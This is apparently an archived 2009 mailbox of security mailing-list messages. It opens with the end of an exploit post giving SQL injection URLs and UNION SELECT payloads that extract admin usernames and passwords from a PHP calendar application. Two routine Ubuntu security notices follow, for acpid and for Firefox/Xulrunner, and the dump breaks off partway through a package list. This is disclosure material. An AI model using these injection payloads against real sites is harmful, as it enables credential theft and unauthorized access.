anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#


----------
EXPLOITS:
----------


We get the admin credentials:


http://[HOST]/[HOME_PATH]/index.php?mode╩lendar&selectedday&month=5&year 09%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*

http://[HOST]/[HOME_PATH]/index.php?mode╩lendar&selectedday&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year 09


anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1#






#######################################################################
#######################################################################
##*******************************************************************##
##               ESPECIAL GREETZ TO: Str0ke, JosS, ...               ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

From - Tue Apr 28 13:18:30 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758e
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40157-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F39E1EC177
for <lists@securityspace.com>; Tue, 28 Apr 2009 13:16:23 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id C75C8143BD9; Tue, 28 Apr 2009 09:04:16 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3572 invoked from network); 27 Apr 2009 21:17:31 -0000
Subject: [USN-766-1] acpid vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-WIoMjvIpIPk66Y5wbQHH"
Date: Mon, 27 Apr 2009 17:25:44 -0400
Message-Id: <1240867544.12065.2.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.26.1 
Status:   


--=-WIoMjvIpIPk66Y5wbQHH
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-766-1             April 27, 2009
acpid vulnerability
CVE-2009-0798
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  acpid                           1.0.4-1ubuntu11.2

Ubuntu 8.04 LTS:
  acpid                           1.0.4-5ubuntu9.3

Ubuntu 8.10:
  acpid                           1.0.6-9ubuntu4.8.10.2

Ubuntu 9.04:
  acpid                           1.0.6-9ubuntu4.9.04.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that acpid did not properly handle a large number of
connections. A local user could exploit this and monopolize CPU resources,
leading to a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-1ubuntu11.2.dsc
      Size/MD5:      532 6cbd96ce3f48daf06f3bf4fdb499cd72
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-1ubuntu11.2.tar.gz
      Size/MD5:    42909 5e273af5829107a45c5b4bdc32090113

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-1ubuntu11.2_amd64.deb
      Size/MD5:    33410 89128e2a91cd77203f5d678276fba069

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-1ubuntu11.2_i386.deb
      Size/MD5:    31772 ff0876cef2bc44bf2549ae5c1aeb6f29

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-5ubuntu9.3.diff.gz
      Size/MD5:    16751 90ec928c507fbfb4bcc7bf8afa4c9110
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-5ubuntu9.3.dsc
      Size/MD5:      682 13300a24b68481c6239449e02aec4c54
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4.orig.tar.gz
      Size/MD5:    23416 3aff94e92186e99ed5fd6dcee2db7c74

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-5ubuntu9.3_amd64.deb
      Size/MD5:    31490 17fd76b0c94c668db0a8811412ef62d2

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.4-5ubuntu9.3_i386.deb
      Size/MD5:    29602 bd2ffb9bb86ab08ee14cfe3b72547217

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/acpid/acpid_1.0.4-5ubuntu9.3_lpia.deb
      Size/MD5:    29638 b94f3ca51af282862df5bb7faa0cb03a

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.8.10.2.diff.gz
      Size/MD5:    18854 d683c232055bc3ba880791ddf50a83dd
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.8.10.2.dsc
      Size/MD5:     1291 92aed8492d636efcf2070977f405d811
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6.orig.tar.gz
      Size/MD5:    24226 5c9b705700df51d232be223b6ab6414d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.8.10.2_amd64.deb
      Size/MD5:    34944 3aeeee135debcfea2feaba99f0bb4071

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.8.10.2_i386.deb
      Size/MD5:    33308 51448592463566566d9ef748987e45fe

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.8.10.2_lpia.deb
      Size/MD5:    33194 a2884b686496e24fa59a7f92489eee9a

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.9.04.2.diff.gz
      Size/MD5:    18858 1d44542b4b218e23667ff3cd13b92c1a
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.9.04.2.dsc
      Size/MD5:     1291 e15c2c64210c0123753b97a1fb53a654
    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6.orig.tar.gz
      Size/MD5:    24226 5c9b705700df51d232be223b6ab6414d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.9.04.2_amd64.deb
      Size/MD5:    34926 444c7b4cdf9dcc1f12327acd573f4ff2

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.9.04.2_i386.deb
      Size/MD5:    33300 4f4a8c94d893f20a8dbc0895ed66f825

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/a/acpid/acpid_1.0.6-9ubuntu4.9.04.2_lpia.deb
      Size/MD5:    33200 b909c43c28a616ce1963344a2c0280b3



--=-WIoMjvIpIPk66Y5wbQHH
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkn2ItYACgkQLMAs/0C4zNpY6wCdGj/kQwqpM0Z+SD1pc8/sHdjQ
/ugAoMH9j5mZDJAFmmdH6YxoG2gqW9qh
=lecL
-----END PGP SIGNATURE-----

--=-WIoMjvIpIPk66Y5wbQHH--

From - Tue Apr 28 16:08:30 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758f
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40171-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6EF6BEC16C
for <lists@securityspace.com>; Tue, 28 Apr 2009 15:59:01 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8F1F61437EE; Tue, 28 Apr 2009 13:49:27 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2303 invoked from network); 28 Apr 2009 19:26:14 -0000
Date: Tue, 28 Apr 2009 14:34:37 -0500
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-765-1] Firefox and Xulrunner vulnerabilities
Message-ID: <20090428193436.GA5455@severus.strandboge.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="T4sUOijqQbZv57TR"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-765-1             April 28, 2009
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2009-1313
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0                     3.0.10+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9                   1.9.0.10+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser                        3.0.10+nobinonly-0ubuntu0.8.10.1
  firefox-3.0                     3.0.10+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9                   1.9.0.10+nobinonly-0ubuntu0.8.10.1

Ubuntu 9.04:
  abrowser                        3.0.10+nobinonly-0ubuntu0.9.04.1
  firefox-3.0                     3.0.10+nobinonly-0ubuntu0.9.04.1
  xulrunner-1.9                   1.9.0.10+nobinonly-0ubuntu0.9.04.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

It was discovered that the upstream security fixes in USN-764-1 introduced
a regression which could cause the browser to crash. If a user were tricked
into viewing a malicious website, a remote attacker could cause a denial of
service or possibly execute arbitrary code with the privileges of the user
invoking the program.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1.diff.gz
      Size/MD5:   106051 0f1db590a876e5bccb45a8bdaea258fd
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1.dsc
      Size/MD5:     2718 452724dee11781f042839384c3a1b055
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly.orig.tar.gz
      Size/MD5: 11615299 f09c27cece35c86f4d79f8b7b8aff58d
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1.diff.gz
      Size/MD5:    77769 c9418389f79880165b0dee1018a21ffa
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1.dsc
      Size/MD5:     2783 8c35591f6e6cc0bed8580ffc04019012
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly.orig.tar.gz
      Size/MD5: 40380909 0990281629cdb7b9065760ef68eb1739

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66170 ab74c6ee0fffec27be2945a8722850ca
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66176 e0778675a69e202c7eb5cc3da8048862
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66142 c52bac8ce9b0aee2070318a159149c5a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66124 330a69c14a085a44371662d18f4d0060
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66284 d5aba0f2ada110c7c2271aad79842b7c
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66188 eb469673eb063dcbeb752513da0c77af
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66142 1ecf71b52dfc9b48bf0c8af99c766c48
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:     8970 3e4571412d23fb1fd590f805d81ad276
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:     8960 1e80e9f1b3c5888963131a6f07a38b91
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66160 95541a26655aaff7ceed47e926889503
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66126 778bd88981e1c883b212f0a36a0900c5
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66114 6b7f5d41d871db1c4e84d2d72d04d099
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:     8946 a648cd4d9ec558ec801975be9ccf2f3e
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66146 3da23d064b62e4aa2aae5012c5622504
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:     8938 c8002cbfc9b6e12999193ee433e5c264
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:    66112 5a530f09fee18dbcfe756426f86cf9a4
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:   125534 cf492ff998b4cf743fd67ba83f0cabbb
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.10+nobinonly-0ubuntu0.8.04.1_all.deb
      Size/MD5:   235546 77d78486996d67598fbf130580bfc5d9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:     9022 43656236dd1fef39056ec0664fea3d0e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:    29576 69de90c235a2bcafd427bcd4325d707f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:  1091506 96050f38d15cc5645984298875f048ab
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:  4044178 ec297805af369e8f46fb4397bb7e54c5
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:    48650 cb7ee44557d615a35e338349a742e4b5
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1_amd64.deb
      Size/MD5:  9049928 eb2de43f6aac98723402b2cd2774ca05

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:     9028 9cbdf1d90dd91263d414156c47bf3b8f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:    25724 4ed2955464cadd41953525cc40705714
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:  1070400 6c4fef16d46b93ee946262cb8055a53a
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:  4025926 c638188f3b59845b4e172aa9fea9529f
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:    38510 fe57960bff3199c8e2bffb9901fc9ae1
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1_i386.deb
      Size/MD5:  7779824 e7f5ce68734a3ea9b4325e198796aa34

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:     9022 e4c3a431978dc861aadec1a50df1d1bf
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:    25350 bf11a3c1177a82bcbaad1642f46b25f5
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:  1067362 bd7c6d674b7dc04a300ac1f087c6bb33
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:  4020980 7f14b1bcd388442a26c6bcbf53e72c00
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:    37610 e6dfa874fc45dc200f896f74ee065fe0
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1_lpia.deb
      Size/MD5:  7670724 a594e40fe2ed1744beafa810fa0c7d18

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:     9028 02e0ac69f0eaad1261600a58e00a01ed
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:    27506 14bbc39e714487193354dd0e88c2ae11
    http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:  1084662 90c6dc051be1cdb79302d22e0a6b241f
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:  4032312 6c46f86d609601cd0844b542506555e0
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:    43678 319549fcb2d7f6ccb51cbb4e62373dea
    http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.04.1_powerpc.deb
      Size/MD5:  8627134 f52fd618f1f7ce794d1ffb4208ce6911

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1.diff.gz
      Size/MD5:   123954 2b205d64ffaa78b26821cb1d4c4148da
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly-0ubuntu0.8.10.1.dsc
      Size/MD5:     2773 e397b8fb8f4e7fc8f7a6b3326cb1c8fe
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.10+nobinonly.orig.tar.gz
      Size/MD5: 11615299 f09c27cece35c86f4d79f8b7b8aff58d
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1.diff.gz
      Size/MD5:   251349 30b63cadbfba864ee946130b076bfdd5
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly-0ubuntu0.8.10.1.dsc
      Size/MD5:     2801 065500a7e4bb0d844a90e540bfe78a5f
    http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.10+nobinonly.orig.tar.gz
      Size/MD5: 40380909 0990281629cdb7b9065760ef68eb1739

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68978 4c7fabda7e997d1398e35b15dbe1b3f7
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68878 c4d16169f47fe66eea780c4d1c2b3944
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68892 891f9316ebfc4f1448f4cb82d5261d7a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68852 f230b4c0de8499bc64face52bc8e061c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68838 2c2726749170452d1f651cd907f74273
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68966 5ae80eefc6a938210a3fff69d932cdb8
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68902 d0414d902ca041a053850d7fd2a82873
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68852 ef45e782ade4be7d3b80372aa1d1fbed
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:     8972 2f858eb3948fac088812009368b5131b
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:     8960 627eab33e5cbeace843cc8a1ee526763
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68868 53eafc89aa57f5883117cf7ff1485693
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68840 4250cd9ac2f1ab4e621464fa0665f6e3
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68826 b0544a26d1e3d003df7c2b3dacf6a0c4
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:     8948 8246f5b530fbf781b726e77e4c950a9a
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68854 1361900047ccdd4e59e13e1d3776069a
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:     8940 8c753d4aca85744a3fca6094a442b859
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:    68822 9b1b32ccfafd7b7a1bad5303585cc67a
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:   127576 28769cae1d70a8ed98e9135ef3a1d993
    http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.10+nobinonly-0ubuntu0.8.10.1_all.deb
      Size/MD5:   237390 877103c7294b6e1c18beaaadd5ab7536

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:   203700 8451023b8f250721879e5e690fbab1c9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:   202050 43a564ec8433e4e67c7c75889151fe1c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:    68942 a1a12a51c49d03ed261862889d425012
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.10+nobinonly-0ubuntu0.8.10.1_amd64.deb
      Size/MD5:    88376 323fbceefc998c36e0bdb47a19178404
